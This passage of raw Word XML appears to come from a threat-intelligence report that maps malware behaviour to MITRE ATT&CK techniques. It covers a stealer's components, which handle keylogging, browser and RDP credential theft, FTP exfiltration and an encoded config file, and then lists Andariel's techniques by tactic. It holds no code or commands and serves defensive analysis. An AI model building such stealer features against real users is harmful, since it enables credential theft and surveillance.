        <w:t>IntelRS.exe - Various stealer components and encryption implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5382328B" w14:textId="1A21C1A2" w:rsidR="00250BE5" w:rsidRDefault="00250BE5" w:rsidP="00250BE5">
      <w:pPr>
        <w:ind w:left="1418"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">P7 - Collects system information: hostname, username, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>timezone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, IP addresses, pen ports, installed applications, running processes, etc </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00250BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00250BE5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1119 Automated Collection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4725FCC1" w14:textId="749F7559" w:rsidR="00250BE5" w:rsidRDefault="00250BE5" w:rsidP="00250BE5">
      <w:pPr>
        <w:ind w:left="1418"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Keylogging </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00387435">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00387435" w:rsidRPr="00387435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1056.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00387435" w:rsidRPr="00387435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Input Capture: Keylogging</w:t>
      </w:r>
      <w:r w:rsidR="00387435">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2465C8ED" w14:textId="5F5B175C" w:rsidR="00387435" w:rsidRDefault="00387435" w:rsidP="00387435">
      <w:pPr>
        <w:ind w:left="1418"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tracks credentials, bookmarks and history from major browsers: Chrome, Firefox, Opera </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00387435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1555.003</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00387435">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credentials from Password Stores: Credentials from Web Browsers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028FDC10" w14:textId="4B61C3F5" w:rsidR="00601B62" w:rsidRDefault="00601B62" w:rsidP="002037C9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>DelphiNative.dll - Browser URL extraction, IE Accounts, RDP accounts (Imported by IntelRS.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326948DB" w14:textId="1C90B515" w:rsidR="007C5AD8" w:rsidRDefault="007C5AD8" w:rsidP="007C5AD8">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>DelphiNative.DLL, which implements some additional data theft functionality for the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1CDAE5" w14:textId="15AE80D3" w:rsidR="007C5AD8" w:rsidRDefault="007C5AD8" w:rsidP="007C5AD8">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">• Internet Explorer (IE) accounts </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="007C5AD8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007C5AD8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1087 Account Discovery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0634CB" w14:textId="77777777" w:rsidR="007C5AD8" w:rsidRDefault="007C5AD8" w:rsidP="007C5AD8">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>• Remote Desktop Protocol (RDP) accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A772F0" w14:textId="6B243306" w:rsidR="007C5AD8" w:rsidRDefault="007C5AD8" w:rsidP="007C5AD8">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>• Browser URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FA02BD" w14:textId="61EC613D" w:rsidR="00601B62" w:rsidRDefault="00601B62" w:rsidP="002037C9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IntelRS.exe.config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - Config containing supported .NET versions for IntelRS.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0947FDF5" w14:textId="5EDC589D" w:rsidR="00601B62" w:rsidRDefault="00601B62" w:rsidP="002037C9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AppTransferWiz.dll </w:t>
      </w:r>
      <w:r w:rsidR="002037C9">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t>FTP exfiltration (Launched by IntelRS.exe)</w:t>
      </w:r>
      <w:r w:rsidR="00A41F9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4480D13C" w14:textId="6290DFEA" w:rsidR="00601B62" w:rsidRDefault="00601B62" w:rsidP="002037C9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RapidStartTech.stl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002037C9">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Base64 encoded config block containing FTP credentials, implant name, decoy name, screenshot interval and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>booleans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for startup, keylogger and screensho</w:t>
      </w:r>
      <w:r w:rsidR="002037C9">
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEAF5DD" w14:textId="52E701AA" w:rsidR="007C5AD8" w:rsidRDefault="007C5AD8" w:rsidP="002037C9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EFAB4E7" w14:textId="77777777" w:rsidR="007C5AD8" w:rsidRDefault="007C5AD8" w:rsidP="007C5AD8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">P8 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0337C3A2" w14:textId="04E625A0" w:rsidR="007C5AD8" w:rsidRDefault="007C5AD8" w:rsidP="007C5AD8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Harvested data is encrypted and written to disk on the local host. The filenames for these encrypted files follow this naming </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>scheme:…</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00013DBA" w:rsidRPr="00013DBA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00013DBA" w:rsidRPr="00013DBA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1560 Archive Collected Data</w:t>
      </w:r>
      <w:r w:rsidR="00013DBA">
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="007C5AD8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1074.001 Data Staged: Local Data Staging</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3E146A" w14:textId="44A1DD35" w:rsidR="00013DBA" w:rsidRDefault="00013DBA" w:rsidP="007C5AD8">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B004A9" w14:textId="4752BD2A" w:rsidR="00013DBA" w:rsidRDefault="00013DBA" w:rsidP="00013DBA">
      <w:r>
        <w:t xml:space="preserve">P9 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2FDA76" w14:textId="30AFF1B0" w:rsidR="00013DBA" w:rsidRDefault="00013DBA" w:rsidP="00013DBA">
      <w:r>
        <w:t>These droppers were also designed to visually spoof the appearance of the above applications. These droppers contained icons used in the legitimate installers for these programs.</w:t>
      </w:r>
      <w:r w:rsidR="00CB70DF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CB70DF">
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00CB70DF" w:rsidRPr="00CB70DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1036.005</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CB70DF" w:rsidRPr="00CB70DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Masquerading: Match Legitimate Name or Location</w:t>
      </w:r>
      <w:r w:rsidR="00CB70DF">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidR="00751E97">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42943575" w14:textId="77777777" w:rsidR="00751E97" w:rsidRDefault="00751E97" w:rsidP="00751E97">
      <w:r>
        <w:t>P12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D7B025" w14:textId="33465317" w:rsidR="00751E97" w:rsidRDefault="00751E97" w:rsidP="00751E97">
      <w:r>
        <w:t xml:space="preserve">We also recovered a tool designed to encode plaintext into Base64 encoded text or decode Base64 encoded text into plaintext. Members of the Ajax Security Team likely this use tool to encode the configuration data seen in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RapidStartTech.stl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> files. As noted above, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RapidStartTech.stl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> contains the backdoor’s FTP credentials, implant name, decoy name, and screenshot interval, along with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> settings for startup, keylogger, and screenshot plugins. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="00751E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1132.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00751E97">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data Encoding: Standard Encoding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r w:rsidR="00730CDF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEE578C" w14:textId="3CAE2B8C" w:rsidR="00730CDF" w:rsidRDefault="000A0FC2" w:rsidP="00751E97">
      <w:r>
        <w:t>P13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C9689D" w14:textId="3F7E328A" w:rsidR="000A0FC2" w:rsidRDefault="000A0FC2" w:rsidP="00751E97">
      <w:r>
        <w:t xml:space="preserve">Email and domains created </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="000A0FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1583.001</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000A0FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Acquire Infrastructure: Domains</w:t>
      </w:r>
      <w:r w:rsidR="00E5132A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E5132A" w:rsidRPr="00E5132A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1585.002</w:t>
      </w:r>
      <w:r w:rsidR="00E5132A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E5132A" w:rsidRPr="00E5132A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Establish Accounts: Email Accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1DD6C0" w14:textId="77777777" w:rsidR="00891095" w:rsidRDefault="00891095">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A00CAC" w14:textId="36B0223A" w:rsidR="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00A16DF2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc110935501"/>
      <w:bookmarkStart w:id="31" w:name="_Toc153480840"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Andariel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E12FA4C" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="005B4630" w:rsidRDefault="00A16DF2" w:rsidP="00A16DF2">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc110935502"/>
      <w:bookmarkStart w:id="33" w:name="_Toc153480841"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="23809822" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="00A16DF2" w:rsidRDefault="00A16DF2" w:rsidP="00A16DF2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0138 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Andariel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17590840"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance ['T1590.005', 'T1592.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9E460F"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1590.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Network Information&gt;:IP Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF279E0"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1592.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Gather Victim Host Information&gt;:Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303A6AB5"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1588.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1C5D8C"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1588.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773D9BBF"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1189', 'T1566.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118CF111"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1189 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Drive-by Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6708C442" w14:textId="77777777" w:rsidR="00A16DF2" w:rsidRPr="00951E34" w:rsidRDefault="00A16DF2" w:rsidP="00A16DF2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00951E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>&lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00951E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00951E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565E02D3"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1204.002', 'T1203']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9F333D"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002B6133">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002B6133">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497D9C27"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Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC5AB5"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A90CA18"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5A367"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A16DF2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1027.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A9876"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00461F9A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
